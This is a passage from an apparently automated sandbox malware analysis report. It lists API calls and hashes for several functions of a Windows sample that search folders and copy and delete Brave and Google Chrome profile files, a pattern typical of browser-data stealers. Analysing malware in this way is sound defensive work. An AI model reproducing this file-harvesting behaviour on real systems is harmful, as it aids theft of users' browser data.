                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: d871dc372d4ea8842c51d634d563bf8e4c3c6ba3f6da2ef014fb3d193f84b872
                                • Instruction ID: acf274eea710237208587bc9dbd05bcd7ea6e775a2bdf8a1472d5a2fe57ca3b1
                                • Opcode Fuzzy Hash: d871dc372d4ea8842c51d634d563bf8e4c3c6ba3f6da2ef014fb3d193f84b872
                                • Instruction Fuzzy Hash: 69A2B070A0025ADBCB21AF76CE98AAF77B8AF14305F04816AF94597351DFBCDD018B58
                                Function 004D16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D16E2
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D176C
                                • lstrcat.KERNEL32(00000000), ref: 004D1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1875
                                • lstrcat.KERNEL32(00000000), ref: 004D187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D18FE
                                • lstrlen.KERNEL32(00501794), ref: 004D1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1929
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1966
                                • lstrlen.KERNEL32(\*.*), ref: 004D1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004D199A
                                  • Part of subcall function 004F4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 004F406D
                                  • Part of subcall function 004F4040: lstrcpy.KERNEL32(00000000,?), ref: 004F40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1A16
                                • lstrlen.KERNEL32(00501794), ref: 004D1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1A41
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1A81
                                • lstrlen.KERNEL32(00501794), ref: 004D1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1AAC
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004D1B45
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004D1B70
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004D1B8A
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1C03
                                • lstrlen.KERNEL32(00501794), ref: 004D1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1C31
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1C74
                                • lstrlen.KERNEL32(00501794), ref: 004D1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1CA2
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1CAE
                                • lstrlen.KERNEL32(?), ref: 004D1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1CE9
                                • lstrlen.KERNEL32(00501794), ref: 004D1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1D14
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1DEB
                                • lstrlen.KERNEL32(00501794), ref: 004D1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1E19
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D1E56
                                • lstrlen.KERNEL32(00501794), ref: 004D1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1E81
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D1E8D
                                • lstrlen.KERNEL32(?), ref: 004D1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004D1F45
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1F9F
                                • lstrlen.KERNEL32(00CF9330), ref: 004D1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1FE3
                                • lstrlen.KERNEL32(00501794), ref: 004D1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D200E
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D204D
                                • lstrlen.KERNEL32(00501794), ref: 004D2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2075
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: f3f96a98cf3ac7225ece0d71610a316abab83a546825c1a2416bede431ad6e99
                                • Instruction ID: e5bb082375b4e13f09592f24d75418ff9ca21a36c1369cfb06bd31d6320e9a25
                                • Opcode Fuzzy Hash: f3f96a98cf3ac7225ece0d71610a316abab83a546825c1a2416bede431ad6e99
                                • Instruction Fuzzy Hash: 83928571A0121AEBCB21AF65DEA8AAF77B9AF10304F04415BF905A7361DB7CDD01CB58
                                Function 004DDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDBEF
                                • lstrlen.KERNEL32(00504CA8), ref: 004DDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC17
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004DDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC4C
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDC8F
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004DDCD0
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004DDCF0
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004DDD0A
                                • lstrlen.KERNEL32(004FCFEC), ref: 004DDD1D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDD7B
                                • lstrlen.KERNEL32(00501794), ref: 004DDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDA3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDDAF
                                • lstrlen.KERNEL32(?), ref: 004DDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 004DDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDE19
                                • lstrlen.KERNEL32(00501794), ref: 004DDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDE6F
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDE7B
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDEBB
                                • lstrlen.KERNEL32(00501794), ref: 004DDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDEE6
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDEF2
                                • lstrlen.KERNEL32(00CF9310), ref: 004DDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFA5
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDFB1
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDFF4
                                • lstrlen.KERNEL32(00501794), ref: 004DDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE022
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DE02E
                                • lstrlen.KERNEL32(00CF9310), ref: 004DE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 004DE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 004DE0E7
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE11F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004DE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE155
                                • lstrcat.KERNEL32(00000000,?), ref: 004DE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE19F
                                • lstrcat.KERNEL32(00000000), ref: 004DE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004DE1F9
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE22F
                                • lstrlen.KERNEL32(00CF9330), ref: 004DE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE261
                                • lstrcat.KERNEL32(00000000,00CF9330), ref: 004DE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 004DE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 004DE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE349
                                • DeleteFileA.KERNEL32(?), ref: 004DE381
                                • StrCmpCA.SHLWAPI(?,00CFDEC0), ref: 004DE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE445
                                • StrCmpCA.SHLWAPI(?,00CF9310), ref: 004DE468
                                • StrCmpCA.SHLWAPI(?,00CF90E0), ref: 004DE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004DE4E0
                                • StrCmpCA.SHLWAPI(?,00CFDF38), ref: 004DE58E
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004DE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 004DE776
                                • DeleteFileA.KERNEL32(?), ref: 004DE7D2
                                • StrCmpCA.SHLWAPI(?,00CF9380), ref: 004DE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: 9546a1a01a2698b91ef59ded1a829644538cc213237aa9a22ce8452d2a1d29fb
                                • Instruction ID: f5115a26466d1c9098957159bfaa50e5e557c92eb54c1f065a8f666058f64766
                                • Opcode Fuzzy Hash: 9546a1a01a2698b91ef59ded1a829644538cc213237aa9a22ce8452d2a1d29fb
                                • Instruction Fuzzy Hash: A392BE71A0021ADBCB20AF75DDA9AAF77B9AF14304F04816BF90597351DB7CEC058B98
                                Function 004E18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E18D2
                                • lstrlen.KERNEL32(\*.*), ref: 004E18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004E190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E1947
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E1967
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E1981
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E19BF
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1A4C
                                • lstrlen.KERNEL32(00501794), ref: 004E1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1A80
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1AB4
                                • lstrlen.KERNEL32(?), ref: 004E1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 004E1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1B19
                                • lstrlen.KERNEL32(00CF9300), ref: 004E1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1B8F
                                • lstrlen.KERNEL32(00501794), ref: 004E1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1BC3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1C57
                                • lstrlen.KERNEL32(00501794), ref: 004E1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1C8B
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1D21
                                • lstrlen.KERNEL32(00501794), ref: 004E1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1D55
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1DED
                                • lstrlen.KERNEL32(00501794), ref: 004E1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1E36
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1E68
                                • lstrlen.KERNEL32(00CFDFF8), ref: 004E1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1EB2
                                • lstrlen.KERNEL32(00501794), ref: 004E1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1EE3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1F15
                                • lstrlen.KERNEL32(00CFE780), ref: 004E1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1F5F
                                • lstrlen.KERNEL32(00501794), ref: 004E1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1F90
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1FC2
                                • lstrlen.KERNEL32(00CEA480), ref: 004E1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2036
                                • lstrlen.KERNEL32(00501794), ref: 004E2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2067
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2098
                                • lstrlen.KERNEL32(?), ref: 004E20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 004E20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2103
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E213F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004E214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 017640484dd1c76673ea25fd26e707b3b6815ceecdb7a29eb3689f0a4518e161
                                • Instruction ID: cbabf6d0fd9f84eb93f4a2f4e60e5357a29f8eafb77a0c82b517f0c31721dbb2
                                • Opcode Fuzzy Hash: 017640484dd1c76673ea25fd26e707b3b6815ceecdb7a29eb3689f0a4518e161
                                • Instruction Fuzzy Hash: FC62C270A0165A9BCB21AF66CE58AAF77B9AF50305F04412BF90197361DF7CDD01CB98
                                Function 004E3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 004E392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 004E3943
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E396C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E3986
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E39F2
                                • lstrlen.KERNEL32(00501794), ref: 004E39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3A1A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3A26
                                • lstrlen.KERNEL32(?), ref: 004E3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 004E3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3A8A
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E3ACE
                                • lstrlen.KERNEL32(?), ref: 004E3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B36
                                • lstrlen.KERNEL32(00501794), ref: 004E3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B6A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B9E
                                • lstrlen.KERNEL32(?), ref: 004E3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 004E3BE0
                                • lstrlen.KERNEL32(00CF9330), ref: 004E3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3C3C
                                • lstrlen.KERNEL32(00CF9300), ref: 004E3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3CB7
